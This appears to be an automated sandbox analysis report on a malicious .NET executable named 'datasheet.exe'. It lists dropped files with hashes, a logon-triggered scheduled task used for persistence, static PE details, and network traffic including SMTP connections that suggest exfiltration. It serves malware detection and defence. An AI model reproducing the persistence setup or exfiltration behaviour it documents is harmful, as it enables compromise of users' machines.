                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:true
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2232
                                                          Entropy (8bit):5.380747059108785
                                                          Encrypted:false
                                                          SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
                                                          MD5:4D3B8C97355CF67072ABECB12613F72B
                                                          SHA1:07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
                                                          SHA-256:75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
                                                          SHA-512:8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
                                                          Malicious:false
                                                          Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21a4lp4u.q25.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c25k4eac.ytn.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e32imc5u.jff.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hf4fykec.hqq.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnlenskk.wxm.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdlmq2ac.acp.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_raerh1ao.1qf.ps1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w04wcsdq.p4i.psm1

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                          C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1599
                                                          Entropy (8bit):5.102789187578615
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLFDxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTp9v
                                                          MD5:B8CE8321CED1114E38C26BB351E00C6C
                                                          SHA1:FBAAF6F8D39F4E713D384C49B47706BF3FA78FBF
                                                          SHA-256:16D9DCCC1CB4323DFCCA42E7F20E5C0D74F9B0E149A4CBAC5A3D47854315538B
                                                          SHA-512:15388B115C1F50AF55AB25DA75841E4610BE7F34B7A470C7924A93DBAFA729651B6F69D7A2D0E86BCAD37E3C1D4AF12CE27474E5BBC1CB4B3E186D3143B0A64E
                                                          Malicious:true
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                          C:\Users\user\AppData\Local\Temp\tmpA381.tmp

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          File Type:XML 1.0 document, ASCII text
                                                          Category:dropped
                                                          Size (bytes):1599
                                                          Entropy (8bit):5.102789187578615
                                                          Encrypted:false
                                                          SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLFDxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTp9v
                                                          MD5:B8CE8321CED1114E38C26BB351E00C6C
                                                          SHA1:FBAAF6F8D39F4E713D384C49B47706BF3FA78FBF
                                                          SHA-256:16D9DCCC1CB4323DFCCA42E7F20E5C0D74F9B0E149A4CBAC5A3D47854315538B
                                                          SHA-512:15388B115C1F50AF55AB25DA75841E4610BE7F34B7A470C7924A93DBAFA729651B6F69D7A2D0E86BCAD37E3C1D4AF12CE27474E5BBC1CB4B3E186D3143B0A64E
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                          C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe

                                                          Download File
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):651776
                                                          Entropy (8bit):7.975503153184261
                                                          Encrypted:false
                                                          SSDEEP:12288:NyAgFdVoC/HeIMOBkXKxh3IfDj3oSPYzeyu0Lu/bs1D0bWCiYNR/WBS9vD:wAgVoC/HemBNheP3Xg6yTLug0WC7ROB0
                                                          MD5:4C7E7BD9EAF56B3936BE87A6904F70F8
                                                          SHA1:22591D29813790D622A1D49A1E0BF91B20235CF6
                                                          SHA-256:429E0FA9706EE65774188E538BDA0B69A15FB93E97864CEDB88E33C650ED9538
                                                          SHA-512:108E542F79D97DCB73490ACD04718A56ADDA3D000E844AD71F0721B3B12D2A06CCB9B28A00E0D2443F2BB5C680617E316CE4A84C98A5E8F4F29ADE1FF9C0BE70
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 55%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T................0.................. ... ....@.. .......................`............@.................................u...O.... ..4....................@......8...p............................................ ............... ..H............text........ ...................... ..`.rsrc...4.... ......................@..@.reloc.......@......................@..B........................H.......p>...E..........x....i...........................................0..N........s....}.....s....}.....s....}.....r...p}.....r...p}......}.....(.......(.....*...0..6..............,..{....r!..po.....+.......,..{....rY..po.....*...0............{....r{..po......{.....o.....r...ps...........(....(.....+3..o........4...%..,.o.....s..........{......o.......o ..........-.....,..o!........+...*.........*.X.........*..0..n........s"......o#....+B..($........do%......F.........,...

                                                          C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe:Zone.Identifier

                                                          Download File
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.975503153184261
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:datasheet.exe
                                                          File size:651'776 bytes
                                                          MD5:4c7e7bd9eaf56b3936be87a6904f70f8
                                                          SHA1:22591d29813790d622a1d49a1e0bf91b20235cf6
                                                          SHA256:429e0fa9706ee65774188e538bda0b69a15fb93e97864cedb88e33c650ed9538
                                                          SHA512:108e542f79d97dcb73490acd04718a56adda3d000e844ad71f0721b3b12d2a06ccb9b28a00e0d2443f2bb5c680617e316ce4a84c98a5e8f4f29ade1ff9c0be70
                                                          SSDEEP:12288:NyAgFdVoC/HeIMOBkXKxh3IfDj3oSPYzeyu0Lu/bs1D0bWCiYNR/WBS9vD:wAgVoC/HemBNheP3Xg6yTLug0WC7ROB0
                                                          TLSH:7FD4235267B64316E4FC37B4E2B015ED17B46486BC82F2C8EA9235D67F25700B305ABB
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0.................. ... ....@.. .......................`............@................................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4a05ca
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0xBAD5FF54 [Tue Apr 30 22:31:48 2069 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa05750x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x634.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x9ed380x70.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x9e5d00x9e600ccc481d32b66e333b7e6d75e0ba8a876False0.979070577644041data7.981872933279261IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xa20000x6340x8006b05a7a25c696b30d8af0c526bad8fa3False0.33935546875data3.472330708843389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xa40000xc0x200dd9614b762850884a94cb7d0255f9c17False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0xa20900x3a4data0.41952789699570814
                                                          RT_MANIFEST0xa24440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 21, 2024 09:02:06.158466101 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:06.158504009 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:06.158586979 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:06.166807890 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:06.166829109 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:07.431925058 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:07.432044983 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:07.435801029 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:07.435811996 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:07.436204910 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:07.509558916 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:07.555340052 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:07.876435995 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:07.876604080 CET44349711104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:07.876724958 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:07.884093046 CET49711443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:08.828397036 CET49714587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:08.948020935 CET5874971477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:08.948120117 CET49714587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:10.243345022 CET5874971477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:10.243590117 CET49714587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:10.363106966 CET5874971477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:10.639749050 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:10.639803886 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:10.640017033 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:10.643841028 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:10.643858910 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:10.691677094 CET5874971477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:10.807663918 CET49714587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:11.746108055 CET49714587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:11.899432898 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:11.899602890 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:11.924987078 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:11.925017118 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:11.925326109 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.066591024 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:12.340601921 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:12.383338928 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.689490080 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.689560890 CET44349716104.26.13.205192.168.2.6
                                                          Nov 21, 2024 09:02:12.689763069 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:12.693764925 CET49716443192.168.2.6104.26.13.205
                                                          Nov 21, 2024 09:02:13.296555042 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:13.416153908 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:13.416249990 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:14.765059948 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:14.802515984 CET49724587192.168.2.677.88.21.158
                                                          Nov 21, 2024 09:02:14.922126055 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.265408039 CET5874972477.88.21.158192.168.2.6
                                                          Nov 21, 2024 09:02:15.265916109 CET49724587192.168.2.677.88.21.158
